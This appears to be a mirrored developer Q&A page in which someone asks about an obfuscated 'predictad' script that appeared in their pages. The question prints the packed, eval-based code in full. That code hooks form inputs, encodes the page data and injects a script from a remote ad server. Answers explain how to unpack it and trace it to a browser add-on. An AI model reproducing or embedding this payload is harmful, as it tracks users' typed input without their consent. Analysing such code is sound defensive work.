开发者

Clandestine .JS code - predictad_myLoc='';

what is the code below trying to do? I get a script error when debugging a small asp.net website. The browser stops and at the code below and the existance of .facebook. in code makes me Suspicious because i don't have it any where in all my web pages. Am curious as to what the code wants to do because i have no idea where that code exists.

predictad_myLoc='';
if (document.location != null) {
    predictad_myLoc = String(document.location);
}
if (predictad_myLoc.indexOf('.facebook.') < 0) {
    eval(function (p, a, c, k, e, r) { e = function (c) { return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) r[e(c)] = k[c] || e(c); k = [function (e) { return r[e] } ]; e = function () { return '\\w+' }; c = 1 }; while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]); return p } ('1F=1m;1G=X;1H=X;1n=0;L 1I(f){5 a=f.1J;f.1J=L(){1o();7(a&&(J a==\'L\'))a()}}2a=X;5 2b=L(){L 1K(a){7(!a)M 1m;5 b=a.1p(/[;&]/);5 c=2c 2d();Y(5 i=0;i<b.N;i++){5 d=b[i].1p(\'=\');7(!d||d.N!=2)1b;5 e=1L(d[0]);5 f=1L(d[1]);f=f.T(/\\+/g,\' \');c[e]=f}M c}5 s=/(1M|2e)[a-2f-9.1N-]*\\.1q(\\?.*)+$/;5 t=O.Z(\'1O\');5 u=t.N-1;Y(10=0;10<t.N;10++){7(t[10].1r.2g(s)){u=10;2h}}5 v=t[u];5 w=v.1r.T(/^[^\\?]+(\\?)*/,\'\');5 x=1K(w);5 y=\'2i\';5 z=x[\'2j\']||y;5 A=x[\'2k\']||\'\';5 B=x[\'2l\']||\'\';7(J 1c=="P"){1c=z}1d=\'\';7(A!=\'\'){1d+=A}1e=\'\';7(B!=\'\'){1e+=B}L 1s(a){7(\'2m\'!=J a)M\'\';a=a.T(/\\r\\n/g,"\\n");5 b="";Y(5 n=0;n<a.N;n++){5 c=a.1f(n);7(\'K\'!=J c){7(c<1g){b+=U.V(c)}S 7((c>2n)&&(c<2o)){b+=U.V((c>>6)|2p);b+=U.V((c&1h)|1g)}S{b+=U.V((c>>12)|2q);b+=U.V(((c>>6)&1h)|1g);b+=U.V((c&1h)|1g)}}}M b}5 C=L(a){5 b="2r-1N*";5 c="",1i,11,13,1t,1u,1j,14,i=0;2s{1i=a.1f(i++);11=a.1f(i++);13=a.1f(i++);1t=1i>>2;1u=((1i&3)<<4)|(11>>4);1j=((11&15)<<2)|(13>>6);14=13&1h;7(1P(11)){1j=14=1Q}S 7(1P(13)){14=1Q}c=c+b.1k(1t)+b.1k(1u)+b.1k(1j)+b.1k(14)}2t(i<a.N);M c};1v=1m;L 1R(){5 a=O.Z(\'2u\');7(a.N>0){5 b=\'\';5 c=\'@\';5 d=\'@\';5 e=\'@\';5 f=\'@\';5 g=\'@\';Y(5 i=0;i<a.N;i++){7(a.8(i)==K)1b;5 h=a.8(i).Q(\'1S\');5 j=a.8(i).Q(\'1w\');5 k=a.8(i).Q(\'1x\');5 l=a.8(i).2v;5 m=a.8(i).Q(\'2w\');5 n=a.8(i).Q(\'1y\');5 o=a.8(i).Q(\'1z\');7(h==K)h=j;7(j==K)j=h;7(k==K)k=\'16\';7(k==\'2x\')k=\'16\';7(n==K)n=\'\';7(o==K)o=\'\';7(h==K&&j==K){h=\'2y\'+i;j=h;a.8(i).R(\'1w\',j)}1v=X;5 p=k.1A();5 q=h.1A();5 r=j.1A();7(p==\'16\'){7(q.W("1T")>=0||q.W("1U")>=0||q.W("1V")>=0||r.W("1T")>=0||r.W("1U")>=0||r.W("1V")>=0){1b}1n++;1I(a.8(i));7(1F){7(o==\'\')a.8(i).R(\'1z\',\'1W\')}S{7(o==\'\'&&(j=="q"||h=="q"))a.8(i).R(\'1z\',\'1W\')}b+=j+\'|\';7(h==j){h=\'\'}c+=h+\'|\';d+=l+\'|\';e+=m+\'|\';f+=n+\'|\';g+=o+\'|\'}}M b+c+d+e+f+g}M\'\'}L 1X(){5 a=O.Z(\'2z\');7(a.N>0){5 b=\'\';5 c=\'@\';5 d=\'@\';5 e=\'@\';5 f=\'@\';Y(5 i=0;i<a.N;i++){7(a.8(i)==K)1b;5 g=a.8(i).Q(\'1S\');5 h=a.8(i).Q(\'1w\');5 j=a.8(i).Q(\'2A\');5 k=a.8(i).Q(\'2B\');5 l=a.8(i).Q(\'2C\');7(g==K)g=\'\';7(h==K)h=\'\';7(j==K)j=\'2D\';7(k==K)k=\'\';7(l==K){l=\'\'}S{7(J l==\'L\'){l=l.1Y();l=l.T(\'\\n\',\'\');l=l.T(\'\\r\',\'\');l=l.T(\'L 2E(){\',\'\');l=l.2F(0,l.N-1);l=l.T(/^\\s+|\\s+$/g,"")}}b+=h+\'|\';c+=g+\'|\';d+=j+\'|\';e+=k+\'|\';f+=l+\'|\'}M b+c+d+e+f+e}M\'\'}L 1Z(){5 a=\'\';5 b=O.2G(\'2H\');a+=((b!=K)?\'1\':\'\');a+=\'|\'+((J 17.20!="P")?20:\'\');a+=\'|\'+((J 17.21!="P")?21:\'\');a+=\'|\'+((J 17.22!="P")?22:\'\');M a}7(J 18==\'P\'){5 D=1;5 E=\'^\';5 F=1R();5 G=1X();5 H=1Z();7(F==\'\')1B=\'2I\';5 I=(("2J:"==O.23.2K)?O.23.1Y():"");7(I!=\'\')1B=\'2L\';1l=(C(1s(D+E+1c+E+F+E+O.1y+E+1d+E+1e+E+G+E+H+E+I)));7(1l.N>2M){1l=(C(1s(D+E+1c+E+F+E+O.1y+E+1d+E+1e+E+\'\'+E+H+E+\'\')))}7(1H&&1n==1)1o()}}();L 1C(a){5 r=a.1p(\'.\');M 1D(r[0])*2N+1D(r[1])*2O+1D(r[2])}L 1o(){7(J(18)!=\'P\')M;7(17.2P==17){7(J 24!=\'P\'){2Q{25=\'1.4.0\';7(1C(24.2R)<1C(25)){M}}2S(e){}}7(J 18==\'P\'){7(1v){19=\'2T\';7(1G){1a=2U.2V();1a=1a;7(1a<0.2W){19+=\'1\'}S{7(1a<0.2X){19+=\'2\'}S{19+=\'3\'}}}7(J(1B)==\'P\'&&J(2Y)==\'P\'&&J(18)==\'P\'){26(\'2Z://\'+19+\'.1M.30/31/32/?\'+1l,\'1q\',\'1E\');18=X}}}}}L 26(a,b,c){7(b=="1q"){5 d=O.27("1O");d.R("1x","16/33");d.R("34","");d.R("35","");d.R("1r",a)}S 7(b=="28"){5 d=O.27("36");d.R("37","38");d.R("1x","16/28");d.R("39",a)}7(J d!="P"){7(c=="1E"){O.Z("1E")[0].29(d)}S{O.Z("3a")[0].29(d)}}}', 62, 197, '|||||var||if|item|||||||||||||||||||||||||||||||||||||typeof|null|function|return|length|document|undefined|getAttribute|setAttribute|else|replace|String|fromCharCode|indexOf|true|for|getElementsByTagName|sindex|chr2||chr3|enc4||text|window|suggestmeyes_loaded|predictad_dtc_subdomain|rand_no|continue|predictad_working_site|predictad_iid|predictad_tid|charCodeAt|128|63|chr1|enc3|charAt|predictad_input_data|false|predictad_inputs_count|predictad_engage|split|js|src|predictad_utf8encode|enc1|enc2|predictad_activate_detection|id|type|title|autocomplete|toLowerCase|predictad_js|convertPVersionString|parseInt|head|predictad_ac_off|predictad_srch_detect_lb|predictad_auto_inj_when_one_input|predictad_warpOnKeyDown|onkeydown|PscriptParseQuery|unescape|predictad|_|script|isNaN|64|predictad_detect_src|name|email|username|password|off|predictad_detect_frm|toString|predictad_detect_cse|googleSearchIframeName|googleSearchFrameWidth|googleSearchDomain|location|Prototype|REQ_PROTOTYPE|predictad_loadjscssfile|createElement|css|appendChild|predictad_has_addon|predictDetectF|new|Object|suggestme|z0|match|break|4831|si|iid|tid|string|127|2048|192|224|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|do|while|input|className|value|search|acpro_inp|form|method|action|onsubmit|get|anonymous|substring|getElementById|googleSearchUnitIframe|emptry|https|protocol|ssl|2000|100000|1000|top|try|Version|catch|srchdetect|开发者_如何学GoMath|random|40|70|predictad_ver|http|com|scripts|acpro|javascript|onload|onreadystatechange|link|rel|stylesheet|href|body'.split('|'), 0, {}))
}


To easily unpack this kind of compressed code, change the eval call to write it to the document so you can copy-and-paste it instead:

<textarea id="q"></textarea>
<script type="text/javascript">
    document.getElementById('q').value= (function (p, a, c, k, e, r)...);
</script>

this spits out a chunk of code you can put in a JS beautifier to read. The results appear to be an ad script. It looks like it detects when you're typing in form fields on the page, and sends the input to its controlling server srchdetect.predictad.com, which will presumably respond with a script to pop up adverts when targeted keywords are used.

If this is appearing on your web pages without your knowledge, I would worry. Where is the application hosted? Are you using a cheap/free web host that might be trying to monetise its customers by sneaking ads onto their pages?


I know this thread is a few months old, but figured as its the top result on google for *predictad_myLoc*, someone else might benefit from this...

I just has this same problem, while working on a clean install of centos, on php script i JUST made. It confused the hell out of me when i saw it in Firebug.

I found an add-on in my firefox Add-Ons called 'Autocomplete Pro'. once I disabled it, and restarted firefox the calls to the function *predictad_myLoc* stopped.

0

上一篇:

下一篇:

精彩评论

暂无评论...
验证码 换一张
取 消

最新问答

问答排行榜